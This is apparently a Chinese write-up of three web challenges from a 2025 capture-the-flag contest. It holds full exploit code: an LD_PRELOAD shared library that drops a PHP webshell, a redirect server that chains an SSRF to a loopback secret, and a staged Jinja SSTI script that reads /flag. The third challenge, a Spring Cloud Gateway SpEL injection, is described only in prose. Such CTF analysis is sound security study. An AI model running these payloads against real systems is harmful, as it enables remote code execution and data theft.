强网拟态2025初赛 Web Writeup

smallcode

<?php
    // Challenge entry point: prints its own source, then exposes two
    // POST-controlled primitives before spawning a background command.
    highlight_file(__FILE__);
    // POST `context`: base64-decoded and written as-is to the relative path
    // "1.txt" (attacker-chosen bytes, fixed file name).
    if(isset($_POST['context'])){
        $context = $_POST['context'];
        file_put_contents("1.txt",base64_decode($context));
    }

    // POST `env`: passed unfiltered to putenv(), so the caller can set any
    // "NAME=value" pair in this process's environment.
    if(isset($_POST['env'])){
        $env = $_POST['env'];
        putenv($env);
    }
    // Runs wget in the background through a shell on every request; the
    // child process inherits whatever variable putenv() set above.
    system("nohup wget --content-disposition -N hhhh &");

编写恶意 so 源码并编译为共享库(例如 gcc -shared -fPIC evil.c -o evil.so)


#include <stdlib.h>
#include <unistd.h>

/*
 * Library constructor: runs automatically as soon as this shared object is
 * loaded into a process (here via LD_PRELOAD), before the host program's
 * own code. It drops a PHP webshell into the web root.
 */
__attribute__ ((__constructor__)) void init(void){
    // Prevent recursive loading: clear LD_PRELOAD first so the shell spawned
    // by system() below does not load this library again.
    unsetenv("LD_PRELOAD");
    
    // Write a one-line webshell that runs the POST parameter `cmd` through
    // system(). The `$` signs are backslash-escaped so the shell passes them
    // to printf literally instead of expanding them as variables.
    system("printf \"<?php if(isset(\\$_POST['cmd'])){system(\\$_POST['cmd']);} ?>\" > /var/www/html/shell.php");
}

把 so 文件内容 base64 编码后,通过 POST 参数 context 上传(服务端会解码并写入 1.txt)

image-20251027110600364

加载

env=LD_PRELOAD=/var/www/html/1.txt

在/var/www/html写shell.php,但是读flag需要提权

find / -perm -u=s -type f 2>/dev/null
nl /flag

image-20251027110632982

safesecret

from flask import Flask, request, jsonify, Response, abort, render_template_string, session
import requests, re
from urllib.parse import urljoin, urlparse

app = Flask(__name__)

# Upper bound on how many follow-up hops my_fetch() will take for one request.
MAX_TOTAL_STEPS = 30
# fetch() returns the raw upstream body on a parse failure only when at least
# this many hops were walked.
ERROR_COUNT = 6

# Matches <meta http-equiv="refresh" content="N; url=..."> (case-insensitive,
# attributes in exactly this order) and captures the URL up to the closing
# quote as group 1.
META_REFRESH_RE = re.compile(
    r'<meta\s+http-equiv=["\']refresh["\']\s+content=["\']\s*\d+\s*;\s*url=([^"\']+)["\']',
    re.IGNORECASE
)


def read(f):
    """Return the entire text content of the file at path *f*.

    The file is opened in text mode with the default encoding and is closed
    deterministically before returning, instead of relying on garbage
    collection to release the handle.

    Raises:
        OSError: if the file cannot be opened or read.
    """
    with open(f) as fh:
        return fh.read()


# Loaded once at import time from /secret (surrounding whitespace stripped);
# login() compares the `secret` query parameter against it and
# internal_flag() discloses it to loopback callers.
SECRET = read("/secret").strip()
# NOTE(review): hard-coded, guessable key. Flask signs the client-side session
# cookie with it, so anyone who knows it can forge session contents -- confirm
# this is acceptable outside a test/CTF setting.
app.secret_key = "a_test_secret"


def sset(key, value) -> str:
    """Store *value* under *key* in the Flask session and return "".

    The empty-string return means that calling this from a template
    expression contributes no visible text to the rendered output.
    """
    session[key] = value
    return ""


def sget(key, default=None):
    """Return the session value stored under *key*, or *default* if absent."""
    return session.get(key, default)


# Register both session helpers as Jinja globals so any template rendered by
# this app can call sget(...) / sset(...) directly.
app.jinja_env.globals.update(sget=sget)
app.jinja_env.globals.update(sset=sset)


@app.route("/_internal/secret")
def internal_flag():
    """Disclose SECRET, but only to callers connecting from loopback.

    Any other peer address is rejected with 403. The response is labelled
    ``application/json`` although the body is a plain ``OK Secret: ...``
    line, i.e. it is not parseable as JSON.
    """
    loopback_only = ("127.0.0.1", "::1")
    caller = request.remote_addr
    if caller not in loopback_only:
        abort(403)
    return Response(f'OK Secret: {SECRET}', mimetype="application/json")


@app.route("/")
def index() -> str:
    """Landing page: returns a fixed greeting."""
    return "welcome"


def _next_by_refresh_header(r, current_url):
    """Return the follow-up URL announced by a ``Refresh`` response header.

    The header is expected to look like ``<delay>; url=<target>``. The part
    after the first ``;`` is split on its first ``=``; the key is compared
    case-insensitively against ``url`` and the value is resolved against
    *current_url*.

    Args:
        r: response object exposing a ``headers`` mapping with ``.get()``.
        current_url: URL the response was fetched from (base for relative
            targets).

    Returns:
        The absolute follow-up URL, or ``None`` when the header is missing,
        has no ``;`` / ``=`` part, names a key other than ``url``, or the
        target cannot be joined.
    """
    refresh = r.headers.get("Refresh")
    if not refresh:
        return None

    # Parse explicitly instead of relying on IndexError/ValueError from
    # split() being swallowed by a blanket `except Exception`.
    _delay, semicolon, directive = refresh.partition(";")
    if not semicolon:
        return None

    key, equals, target = directive.partition("=")
    if not equals or key.strip().lower() != "url":
        return None

    try:
        return urljoin(current_url, target.strip())
    except ValueError:
        # urljoin rejects some malformed targets (e.g. an unbalanced IPv6
        # bracket); treat those as "no follow-up" as before.
        return None


def _next_by_meta_refresh(r, current_url):
    """Return the follow-up URL from an HTML ``<meta refresh>`` tag, if any.

    Only the first 5000 characters of the response text are scanned with
    META_REFRESH_RE; the captured target is stripped and resolved against
    *current_url*. Returns ``None`` when no tag matches.
    """
    head = r.text[:5000]
    found = META_REFRESH_RE.search(head)
    if found is None:
        return None
    target = found.group(1).strip()
    return urljoin(current_url, target)


def _next_by_authlike_header(r, current_url):
    """Return the follow-up URL from ``X-Next`` on a 401/407/429 response.

    For any other status code, or when the header is missing or empty, the
    result is ``None``. The header value is resolved against *current_url*.
    """
    if r.status_code not in (401, 407, 429):
        return None
    hint = r.headers.get("X-Next")
    return urljoin(current_url, hint) if hint else None


def my_fetch(url):
    """Fetch *url* and follow application-level "soft redirects".

    HTTP 3xx redirects are deliberately not followed
    (``allow_redirects=False``). After each response the function looks for a
    follow-up URL, in this order: ``Refresh`` header, HTML ``<meta refresh>``
    tag, then ``X-Next`` on a 401/407/429 response. At most MAX_TOTAL_STEPS
    follow-ups are taken.

    Args:
        url: the first URL to request.

    Returns:
        A ``(history, last_resp, err)`` tuple. ``history`` is a list with one
        dict per request made (``url``, ``status``, ``headers``, and the
        first 800 characters of the body as ``body_preview``). On success
        ``last_resp`` is the final response and ``err`` is ``None``; if a
        request raises, ``last_resp`` is ``None`` and ``err`` is a message.

    NOTE(review): fetch() passes a caller-supplied URL here and nothing
    restricts the scheme or host of the follow-up targets, so loopback-only
    endpoints are reachable through this function. Left as-is; flagged for
    review.
    """
    # Tried in order; the first resolver returning a truthy URL wins.
    resolvers = (
        _next_by_refresh_header,
        _next_by_meta_refresh,
        _next_by_authlike_header,
    )

    current_url = url
    count_redirect = 0
    history = []
    last_resp = None

    # The client is named `http` so it no longer shadows the Flask `session`
    # imported at module level, and the context manager releases its
    # connection pool on every exit path. The earlier debug print() calls
    # were dropped: they wrote every upstream body to stdout.
    with requests.Session() as http:
        while count_redirect < MAX_TOTAL_STEPS:
            try:
                r = http.get(current_url, allow_redirects=False, timeout=5)
            except Exception as e:
                # Best-effort boundary: any transport failure becomes an
                # error string for the caller rather than an exception.
                return history, None, f"Upstream request failed: {e}"

            last_resp = r
            history.append({
                "url": current_url,
                "status": r.status_code,
                "headers": dict(r.headers),
                "body_preview": r.text[:800],
            })

            nxt = None
            for resolve in resolvers:
                nxt = resolve(r, current_url)
                if nxt:
                    break
            if not nxt:
                break

            current_url = nxt
            count_redirect += 1

    return history, last_resp, None


@app.route("/fetch")
def fetch():
    """Fetch the ``url`` query parameter via my_fetch() and validate the result.

    Responses:
        400 -- ``url`` is missing or empty.
        502 -- my_fetch() reported an error, or the final response is falsy.
        200 -- the final body parsed as JSON (when its Content-Type mentions
               ``application/json``) or otherwise contains MUST_HAVE_FIELD;
               only the body length is returned.
        500 -- validation failed. If at least ERROR_COUNT follow-up hops were
               walked, the first 5000 characters of the final body are
               returned as text/plain; otherwise a generic JSON error.

    NOTE(review): ``not final`` relies on the truthiness of the response
    object; for requests.Response that appears to follow ``.ok``, so 4xx/5xx
    final responses would also land in the "no response" branch -- confirm
    whether that is intended.
    """
    target = request.args.get("url")
    if not target:
        return jsonify({"error": "no url"}), 400

    trail, final, failure = my_fetch(target)
    if failure:
        return jsonify({"error": failure}), 502
    if not final:
        return jsonify({"error": "no response"}), 502

    hops = len(trail) - 1
    try:
        declared_type = (final.headers.get("Content-Type") or "").lower()
        if "application/json" in declared_type:
            # Parsed only for validation; the decoded value is discarded.
            final.json()
        elif "MUST_HAVE_FIELD" not in final.text:
            raise ValueError("JSON schema mismatch")
        return jsonify({"ok": True, "len": len(final.text)})
    except Exception:
        if hops < ERROR_COUNT:
            return jsonify({"error": "Invalid JSON"}), 500
        return Response(final.text[:5000], mimetype="text/plain", status=500)


@app.route("/login")
def login():
    """Greet ``username`` after checking the shared ``secret``.

    Query parameters:
        secret: must equal SECRET, otherwise 403.
        username: at most 47 characters and must not contain any blacklisted
            substring (case-insensitive), otherwise 400 / 403. A missing
            value is treated as the empty string.

    On success the username is stored in the session and the rendered
    greeting is returned.
    """
    # Default to "" (as `secret` already does) so a request without
    # `username` no longer reaches len(None) and fails with a 500.
    username = request.args.get("username", "")
    secret = request.args.get("secret", "")
    blacklist = ("config", "_", "read", "{{")
    if secret != SECRET:
        return ("forbidden", 403)

    if len(username) > 47:
        return ("username too long", 400)

    lowered = username.lower()
    if any(word in lowered for word in blacklist):
        return ("forbidden", 403)

    sset('username', username)

    # NOTE(review): SECURITY -- `username` is concatenated into the template
    # *source*, so Jinja evaluates whatever template syntax it contains
    # (e.g. `{% ... %}`, which the blacklist does not cover). Passing it as a
    # template variable instead would close this; left unchanged here.
    return render_template_string("Welcome: " + username)


# Script entry point: serve on every interface, port 5000.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

至少需要六次跳转(walked_steps = len(history) - 1 >= ERROR_COUNT = 6)才会在解析失败时回显原始响应;下面的 Exp 一共跳转七次

用 AI 写一个 Exp,放到 VPS 上运行

from http.server import HTTPServer, BaseHTTPRequestHandler

class RefreshRedirectHandler(BaseHTTPRequestHandler):
    """Serve a fixed chain of ``Refresh``-header hops ending at FINAL_TARGET.

    Each path in HOPS answers 200 with ``Refresh: 0; url=<next hop>``; the
    last path points at FINAL_TARGET instead. Any other path gets a 404.
    Paths are matched exactly (a query string makes the path unknown).
    """

    # Ordered hop paths; a request for HOPS[i] is sent on to HOPS[i + 1].
    HOPS = (
        '/start',
        '/step1',
        '/step2',
        '/step3',
        '/step4',
        '/step5',
        '/step6',
    )
    # Where the last hop sends the client.
    FINAL_TARGET = 'http://127.0.0.1:5000/_internal/secret'

    def do_GET(self):
        """Answer one hop of the chain, or 404 for an unknown path."""
        print(f"Request: {self.path}")

        try:
            position = self.HOPS.index(self.path)
        except ValueError:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b'Not Found')
            return

        is_last = position == len(self.HOPS) - 1
        if is_last:
            target, body = self.FINAL_TARGET, b'Final redirect...'
        else:
            target, body = self.HOPS[position + 1], b'Redirecting...'

        self.send_response(200)
        self.send_header('Refresh', f'0; url={target}')
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        """Print access-log lines to stdout with a ``LOG:`` prefix."""
        # `format` shadows the builtin, but the name is kept to match the
        # base-class signature being overridden.
        print(f"LOG: {format % args}")

# Script entry point: listen on every interface, port 8000, until interrupted.
if __name__ == '__main__':
    server = HTTPServer(('0.0.0.0', 8000), RefreshRedirectHandler)
    print('Starting Refresh header redirect server on port 8000...')
    server.serve_forever()

访问/fetch?url=http://vps:port/start即可

image-20251027110736747

拿到Secret: 1140457d-a0b5-4e6d-a423-5a676e61992a

login?secret=1140457d-a0b5-4e6d-a423-5a676e61992a&username={%print(1)%}

下面就需要绕ssti黑名单和长度限制

这里过滤了config,那么就不能用config.update,如果要打继承链的话需要一个全局字典

可以看到

image-20251027110816184

我们可以通过sset设置session中的键值对,再用sget获取session的值

构造出来

sget['__globals__']['read']('/flag')
#等价于read('/flag')

实际上就是通过globals获取到read函数,再通过read函数去读取/flag

import requests
import re

# Base URL of the challenge instance (trailing slash required: exp() appends
# the route name directly).
url = "http://web-aff0e10d2f.challenge.xctf.org.cn/"
# Value sent as the `secret` query parameter of /login.
secret_key = "1140457d-a0b5-4e6d-a423-5a676e61992a"


def exp():
    """Run the staged /login template-injection exploit and print the result.

    Blacklisted strings cannot appear in ``username``, so they are smuggled
    in through extra query parameters and parked in the session with
    ``sset``. A final short payload reads them back with ``sget`` and
    evaluates ``sget[<g>][<r>](<f>)``. All requests share one HTTP session so
    the session cookie carries the staged values forward.

    Prints the final response body, plus the flag if one is found in it.
    """
    login_url = url + "login"

    # One request per smuggled string: session key -> value taken from a
    # query parameter of the same name.
    payloads = [
        {"username": "{%print sset('g',request.args.g)%}", "g": "__globals__"},
        {"username": "{%print sset('r',request.args.r)%}", "r": "read"},
        {"username": "{%print sset('f',request.args.f)%}", "f": "/flag"},
    ]
    payload4 = {
        "secret": secret_key,
        "username": "{%print sget[sget('g')][sget('r')](sget('f'))%}",
    }

    # The context manager closes the connection pool; explicit timeouts keep
    # the script from hanging forever on an unresponsive target.
    with requests.Session() as s:
        for payload in payloads:
            s.get(login_url, params={"secret": secret_key, **payload}, timeout=10)
        res = s.get(login_url, params=payload4, timeout=10)

    result = res.text
    print(result)

    # The regex alone decides; a separate substring pre-check is redundant.
    flag_match = re.search(r"flag\{[^}]+\}", result)
    if flag_match:
        print(f"\n找到FLAG: {flag_match.group(0)}")

# Script entry point: run the exploit once.
if __name__ == "__main__":
    exp()

image-20251027110903309

ezcloud

扫目录发现有actuator接口泄露

发现 Spring Cloud Gateway,最近刚爆出 SpEL 表达式注入漏洞(CVE-2025-41243)

然后参考这篇文章 https://rce.moe/2025/09/29/CVE-2025-41243/ 里的文件读取方法,即可读取 flag

image-20251027110937674

image-20251027110953660

每次设置完路由后,都需要用 POST 请求访问 /actuator/gateway/refresh 使路由生效

image-20251027111019968

image-20251027111031293

将路由设置到根目录后,再访问 /webjars/flag

image-20251027111104591